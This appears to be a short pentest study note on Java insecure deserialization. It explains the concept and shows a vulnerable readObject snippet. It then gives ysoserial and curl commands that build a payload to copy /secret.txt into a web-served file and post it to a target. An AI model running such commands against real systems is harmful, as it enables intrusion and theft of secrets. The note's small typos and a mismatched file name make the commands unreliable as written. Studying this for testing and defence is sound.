Insecure Desensitization
Insecure Desensitization happens in any object-oriented programming language that supports concept of serialization and deserialization. Commonly seen in Java, but can affect .NET, php, Ruby, and Python.
Serialization is the process of converting variables and objects in memory of a process into a format (stream of bytes) that can be stored or transmitted.
Deserialization is the process of converting a stream of bytes back into an object in memory of a currenty process.
Since serialized object is stored on the client side, an attacker can easily modify the serialized object. Searialized object is binary representation of the object, as long as we know how to parse (and modify) it, there is nothing preventing us from doing that.
Technologies that rely on selrialization:
Remote Method Invocation (RMI)
Java Management Extension (JMX)
Java Message Service (JMS)
Java Server Faces implementation (ViewState)
Custom implementation protocol:
InputStream is = request.getInputStream();
ObjectINputStream ois = new ObjectInputStream(oius);
ois.readObject();
Exploitation
Can modify sensitive parameters stored in serialized object.
Remote Code execution through insecure deserialization
Using ysoserial tool
java -jar ysoserial.jar [payload] '[command]'
Example


java -jar /usr/local/bin/ysoserial-master-SNAPSHOT.jar CommonsCollections5 'cp /secret.txt /opt/app/files/dummy.html' > deser.obj
base64 deser.obj > deser.b64
Send
curl -v --cookie SID=12345 --data-urlencode "obj=`cat deser-file.b64`" http://172.17.0.2:8080/API

Tools: ysoserial
Resources
GrrrDog /Java-Deserialization-Cheat-Sheet The cheat sheet about Java Deserialization vulnerabilities: https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet
Last updated
Was this helpful?